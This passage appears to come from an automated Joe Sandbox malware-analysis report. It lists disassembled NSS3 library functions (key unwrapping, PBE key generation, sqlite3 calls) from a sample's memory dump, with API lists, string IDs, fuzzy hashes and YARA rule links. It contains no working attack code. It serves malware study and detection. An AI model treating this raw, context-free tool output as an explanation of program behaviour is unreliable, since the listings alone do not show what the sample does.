                                                                                                                                                                                                                          • SECOID_FindOID_Util.NSS3(?), ref: 6C497DDC
                                                                                                                                                                                                                            • Part of subcall function 6C4D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C478298,?,?,?,6C46FCE5,?), ref: 6C4D07BF
                                                                                                                                                                                                                            • Part of subcall function 6C4D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C4D07E6
                                                                                                                                                                                                                            • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D081B
                                                                                                                                                                                                                            • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D0825
                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C497DF3
                                                                                                                                                                                                                          • PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6C497F07
                                                                                                                                                                                                                          • PK11_GetPadMechanism.NSS3(00000000), ref: 6C497F57
                                                                                                                                                                                                                          • PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6C497F98
                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?), ref: 6C497FC9
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C497FDE
                                                                                                                                                                                                                          • PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6C498000
                                                                                                                                                                                                                            • Part of subcall function 6C4B9430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6C497F0C,?,00000000,00000000,00000000,?), ref: 6C4B943B
                                                                                                                                                                                                                            • Part of subcall function 6C4B9430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6C4B946B
                                                                                                                                                                                                                            • Part of subcall function 6C4B9430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6C4B9546
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C498110
                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(00000000), ref: 6C49811D
                                                                                                                                                                                                                          • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C49822D
                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C49823C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1923011919-0
                                                                                                                                                                                                                          • Opcode ID: 3d1124ec9153cc42975f9aaf5cee9d1dd213df5c75a9bfdd5ace135cfb3653bd
                                                                                                                                                                                                                          • Instruction ID: 3d6cabd613790614b46582de1963f51f220e246dab9f8b21b7d24ccd2387368f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d1124ec9153cc42975f9aaf5cee9d1dd213df5c75a9bfdd5ace135cfb3653bd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0DC152B1D442699BEF21CF14CC40FDABBB9AF15348F0081E9E91DA6641E7319E85CFA1
                                                                                                                                                                                                                          Function 6C40AEC0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,00000002,?,6C52CF46,?,6C3FCDBD,?,6C52BF31,?,?,?,?,?,?,?), ref: 6C40B039
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C52CF46,?,6C3FCDBD,?,6C52BF31), ref: 6C40B090
                                                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,6C52CF46,?,6C3FCDBD,?,6C52BF31), ref: 6C40B0A2
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,6C52CF46,?,6C3FCDBD,?,6C52BF31,?,?,?,?,?,?,?,?,?), ref: 6C40B100
                                                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,00000002,?,6C52CF46,?,6C3FCDBD,?,6C52BF31,?,?,?,?,?,?,?), ref: 6C40B115
                                                                                                                                                                                                                          • sqlite3_free.NSS3(?,?,?,?,?,?,6C52CF46,?,6C3FCDBD,?,6C52BF31), ref: 6C40B12D
                                                                                                                                                                                                                            • Part of subcall function 6C3F9EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C40C6FD,?,?,?,?,6C45F965,00000000), ref: 6C3F9F0E
                                                                                                                                                                                                                            • Part of subcall function 6C3F9EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C45F965,00000000), ref: 6C3F9F5D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
                                                                                                                                                                                                                          • String ID: `Xl
                                                                                                                                                                                                                          • API String ID: 3155957115-2906863447
                                                                                                                                                                                                                          • Opcode ID: 9e7e13960ee60444cd0230765f6eef5c2bd0ea210cdb44b6913bbbd189f276c5
                                                                                                                                                                                                                          • Instruction ID: 99099527c63fbb061568726c3277ef77c8bda0216a9976a7704aa908567d0837
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9e7e13960ee60444cd0230765f6eef5c2bd0ea210cdb44b6913bbbd189f276c5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AD91BAB0B442068FEB04CF24C884F6AB7B1FF45309B154A3DE4169BB50EB34E981CB99
                                                                                                                                                                                                                          Function 6C4A0EC0 Relevance: 16.7, APIs: 11, Instructions: 213memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PK11_PubDeriveWithKDF.NSS3 ref: 6C4A0F8D
                                                                                                                                                                                                                          • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C4A0FB3
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C4A1006
                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?), ref: 6C4A101C
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C4A1033
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C4A103F
                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(00000000), ref: 6C4A1048
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C4A108E
                                                                                                                                                                                                                          • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C4A10BB
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,00000006,?), ref: 6C4A10D6
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?), ref: 6C4A112E
                                                                                                                                                                                                                            • Part of subcall function 6C4A1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C4A08C4,?,?), ref: 6C4A15B8
                                                                                                                                                                                                                            • Part of subcall function 6C4A1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C4A08C4,?,?), ref: 6C4A15C1
                                                                                                                                                                                                                            • Part of subcall function 6C4A1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4A162E
                                                                                                                                                                                                                            • Part of subcall function 6C4A1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4A1637
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1510409361-0
                                                                                                                                                                                                                          • Opcode ID: 3dd8b16757146c2e012579e9a4c98325792c97e4cb908736411145253bdf1af3
                                                                                                                                                                                                                          • Instruction ID: 2c40c2aa05501ae4cc48840da4baa43e46b3682fb29e5a46d253667e6808e001
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3dd8b16757146c2e012579e9a4c98325792c97e4cb908736411145253bdf1af3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7571FFB5E04201CFDB00CFA6CC80EAAB7B5BF58318F14862CE90997B15E771D946CB91
                                                                                                                                                                                                                          Function 6C4C1CE0 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 401COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000020), ref: 6C4C1F19
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000020), ref: 6C4C2166
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000010), ref: 6C4C228F
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000010), ref: 6C4C23B8
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C4C241C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$Error
                                                                                                                                                                                                                          • String ID: manufacturer$model$serial$token
                                                                                                                                                                                                                          • API String ID: 3204416626-1906384322
                                                                                                                                                                                                                          • Opcode ID: 279f69142dcc704d427feda416484e0c18e29ef950b20e5698c8df1d4e8f70b3
                                                                                                                                                                                                                          • Instruction ID: 659b0a025c6e2e616514a7169c98a9ec15efc2ab9a3bda8b3a13508204cb1fea
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 279f69142dcc704d427feda416484e0c18e29ef950b20e5698c8df1d4e8f70b3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 100230AAF0C7C86EF731C271C44CFC76AE09B45329F18266EC59E46793CBE859498352
                                                                                                                                                                                                                          Function 6C400FE0 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 227COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C3FCA30: EnterCriticalSection.KERNEL32(?,?,?,6C45F9C9,?,6C45F4DA,6C45F9C9,?,?,6C42369A), ref: 6C3FCA7A
                                                                                                                                                                                                                            • Part of subcall function 6C3FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C3FCB26
                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6C40103E
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C401139
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6C401190
                                                                                                                                                                                                                          • sqlite3_free.NSS3(00000000), ref: 6C401227
                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6C40126E
                                                                                                                                                                                                                          • sqlite3_free.NSS3(?), ref: 6C40127F
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
                                                                                                                                                                                                                          • String ID: PXl$delayed %dms for lock/sharing conflict at line %d$winAccess
                                                                                                                                                                                                                          • API String ID: 2733752649-599401849
                                                                                                                                                                                                                          • Opcode ID: c412f2177311994f0d3dd46c194a51709b64330d0e44857f393b415bd7a45882
                                                                                                                                                                                                                          • Instruction ID: fcc294771b3d1a573e1846f118ab1fe3be98fb48d25d47074b38ea2367236cd4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c412f2177311994f0d3dd46c194a51709b64330d0e44857f393b415bd7a45882
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A713A317457019BEB08DF64DC85E6A33B6FB8A329F15423DE8119BB80DB70E941C79A
                                                                                                                                                                                                                          Function 6C4C6C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C471C6F,00000000,00000004,?,?), ref: 6C4C6C3F
                                                                                                                                                                                                                            • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C471C6F,00000000,00000004,?,?), ref: 6C4C6C60
                                                                                                                                                                                                                          • PR_ExplodeTime.NSS3(00000000,6C471C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C471C6F,00000000,00000004,?,?), ref: 6C4C6C94
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                                                                                                                                                          • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                                                          • API String ID: 3534712800-180463219
                                                                                                                                                                                                                          • Opcode ID: fede46b7e1200139fbb2179b3e8ed4e53b59ab7bab863943c133c24c37272fe5
                                                                                                                                                                                                                          • Instruction ID: 7566b953fb5134e0efe5ffc407b7f3cddde754fe5fdc9017ec793f21faddc40b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fede46b7e1200139fbb2179b3e8ed4e53b59ab7bab863943c133c24c37272fe5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5D514C76B016494FC708CDADDC52BEAB7DA9BE4310F48C23AE842DB785D638E906C751
                                                                                                                                                                                                                          Function 6C540F20 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 394stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,-00000001), ref: 6C541027
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C5410B2
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C541353
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memcpy$strlen
                                                                                                                                                                                                                          • String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
                                                                                                                                                                                                                          • API String ID: 2619041689-2155869073
                                                                                                                                                                                                                          • Opcode ID: 9a21f5e22d29aa833ae8d57df20ee8051a500afd690f39b3d04bf3bb215b9c46
                                                                                                                                                                                                                          • Instruction ID: b706ec1af18f49776b24574a5296b55c8148aa7b2aedd4cdbb35940271324d8e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a21f5e22d29aa833ae8d57df20ee8051a500afd690f39b3d04bf3bb215b9c46
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F2E1AF75A08380DFD714CF25C880A6BBBF1AFC6348F14892DE98987B51E771E855CB82
                                                                                                                                                                                                                          Function 6C548FB0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 289COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C548FEE
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5490DC
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C549118
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C54915C
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5491C2
                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C549209
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                          • String ID: 3333$UUUU
                                                                                                                                                                                                                          • API String ID: 1967222509-2679824526
                                                                                                                                                                                                                          • Opcode ID: b28e4f32eba8fc58c79816c637ad2ddf0a0ca6bf65baf65cb1fd386395a79438
                                                                                                                                                                                                                          • Instruction ID: f6b5ddcf814d9d77b1de30727796fc655a8d2700ead46186cd8eea8324e8ba86
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b28e4f32eba8fc58c79816c637ad2ddf0a0ca6bf65baf65cb1fd386395a79438
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C5A1A272E001159BDB04CB68CD81BAEB7B9BF88324F0A8129D919B7741E736EC41CBD1
                                                                                                                                                                                                                          Function 6C4DBD30 Relevance: 13.6, APIs: 9, Instructions: 102COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C4DBD48
                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C4DBD68
                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C4DBD83
                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C4DBD9E
                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6C4DBDB9
                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6C4DBDD0
                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6C4DBDEA
                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6C4DBE04
                                                                                                                                                                                                                          • NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6C4DBE1E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AlgorithmPolicy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2721248240-0
                                                                                                                                                                                                                          • Opcode ID: 723a4102b598834bc975c251d82f1556583ca59352abc1975d098b217f30361d
                                                                                                                                                                                                                          • Instruction ID: 903f240ee7ad57ad7270bb0d851cf4e57ecc02f6b71cad16f2afa42c86911af2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 723a4102b598834bc975c251d82f1556583ca59352abc1975d098b217f30361d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E219376E0439A57FF00EA579C63F8F32749B9274FF0A0158E91AAF741E710B41886E6
                                                                                                                                                                                                                          Function 6C588D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON
